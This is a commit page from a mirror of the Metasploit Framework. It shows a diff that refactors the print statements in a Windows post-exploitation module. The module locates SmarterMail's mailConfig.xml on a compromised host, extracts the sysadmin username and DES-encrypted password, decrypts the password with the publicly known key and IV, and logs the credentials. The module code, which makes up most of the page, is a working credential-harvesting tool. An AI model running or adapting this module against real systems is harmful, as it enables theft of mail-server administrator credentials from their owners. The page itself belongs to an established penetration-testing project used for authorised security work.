infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Modify prints

bug/bundler_fix
sinn3r 2014-02-02 21:58:10 -06:00
parent 62dca111f8
commit 2b2194cee8
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 19 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
modules/post/windows/gather/credentials/smartermail.rb
View File

@ -1,15 +1,13 @@
# -*- coding: utf-8 -*-
## ##
# This module requires Metasploit: http//metasploit.com/download # This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core' require 'msf/core'
require 'msf/core/auxiliary/report' require 'msf/core/auxiliary/report'
require 'rex'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Post::File
def initialize(info = {}) def initialize(info = {})
super(update_info( super(update_info(
@ -19,12 +17,13 @@ class Metasploit3 < Msf::Post
This module extracts and decrypts the sysadmin password in the This module extracts and decrypts the sysadmin password in the
SmarterMail 'mailConfig.xml' configuration file. The encryption SmarterMail 'mailConfig.xml' configuration file. The encryption
key and IV are publicly known. key and IV are publicly known.
This module has been tested successfully on SmarterMail versions This module has been tested successfully on SmarterMail versions
10.7.4842 and 11.7.5136. 10.7.4842 and 11.7.5136.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' => [
'Joe Giron @theonlyevil1', # Discovery and PoC 'Joe Giron', # Discovery and PoC (@theonlyevil1)
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
], ],
'References' => 'References' =>
@ -36,6 +35,10 @@ class Metasploit3 < Msf::Post
)) ))
end end
def peer
"#{session.sock.peerhost} (#{sysinfo['Computer']})"
end
# #
# Decrypt DES encrypted password string # Decrypt DES encrypted password string
# #
@ -56,12 +59,10 @@ class Metasploit3 < Msf::Post
['Program Files (x86)', 'Program Files'].each do |program_dir| ['Program Files (x86)', 'Program Files'].each do |program_dir|
begin begin
path = "#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml" path = "#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml"
vprint_status "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"
"Checking for SmarterMail config file: #{path}"
return path if client.fs.file.stat(path) return path if client.fs.file.stat(path)
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Could not load #{path} - #{e}"
"Could not load #{path} - #{e}"
return return
end end
end end
@ -72,18 +73,15 @@ class Metasploit3 < Msf::Post
# #
def get_smartermail_creds(path) def get_smartermail_creds(path)
result = {} result = {}
vprint_status "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + vprint_status "#{peer} - Retrieving SmarterMail sysadmin password"
'Retrieving SmarterMail sysadmin password'
begin begin
data = read_file("#{path}") || '' data = read_file("#{path}") || ''
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Failed to download #{path} - #{e.to_s}"
"Failed to download #{path} - #{e}"
return return
end end
if data.nil? if data.nil?
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Configuration file is empty."
'Configuration file is empty.'
return return
end end
username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/) username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
@ -100,27 +98,26 @@ class Metasploit3 < Msf::Post
# check for SmartMail config file # check for SmartMail config file
config_path = check_smartermail config_path = check_smartermail
if config_path.nil? if config_path.nil?
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Could not find SmarterMail config file"
'Could not find SmarterMail config file'
return return
end end
# retrieve username and decrypted password from config file # retrieve username and decrypted password from config file
result = get_smartermail_creds(config_path) result = get_smartermail_creds(config_path)
if result['password'].nil? if result['password'].nil?
print_error "#{session.sock.peerhost} (#{sysinfo['Computer']}) - " + print_error "#{peer} - Could not decrypt password string"
'Could not decrypt password string'
return return
end end
# report result # report result
print_good "#{session.sock.peerhost} (#{sysinfo['Computer']}) - Found credentials. " + user = result['username']
"Username: '#{result['username']}' Password: '#{result['password']}'" pass = result['password']
print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
report_auth_info( report_auth_info(
:host => session.sock.peerhost, :host => session.sock.peerhost,
:sname => 'http', :sname => 'http',
:user => result['username'], :user => user,
:pass => result['password'], :pass => pass,
:source_id => session.db_record ? session.db_record.id : nil, :source_id => session.db_record ? session.db_record.id : nil,
:source_type => 'vuln') :source_type => 'vuln')
end end